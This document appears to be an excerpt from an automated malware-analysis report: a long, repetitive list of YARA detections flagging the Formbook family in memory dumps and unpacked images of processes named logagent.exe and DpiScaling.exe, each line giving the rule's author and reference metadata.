Source: 25.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 22.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 22.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 25.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 25.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 22.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 22.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 25.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 25.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 25.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 25.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 22.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 22.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 22.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 22.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 25.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 25.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 22.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 22.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 25.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 25.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 22.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 22.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 22.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 22.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 25.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 25.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 22.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 22.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 22.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 22.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 25.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 25.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 25.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 25.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 25.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 25.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.444169115.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.444169115.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000000.460806286.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000000.460806286.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.443254780.0000000000620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.443254780.0000000000620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000000.341156257.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.341156257.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000000.443394181.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000000.443394181.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.482010889.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.482010889.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.458795604.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.458795604.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000000.380170641.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.380170641.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000000.341917837.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.341917837.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000000.443995537.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000000.443995537.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000000.442522254.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000000.442522254.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000000.418077999.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.418077999.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000000.460438010.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000000.460438010.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000000.461529768.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000000.461529768.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.480269779.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.480269779.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
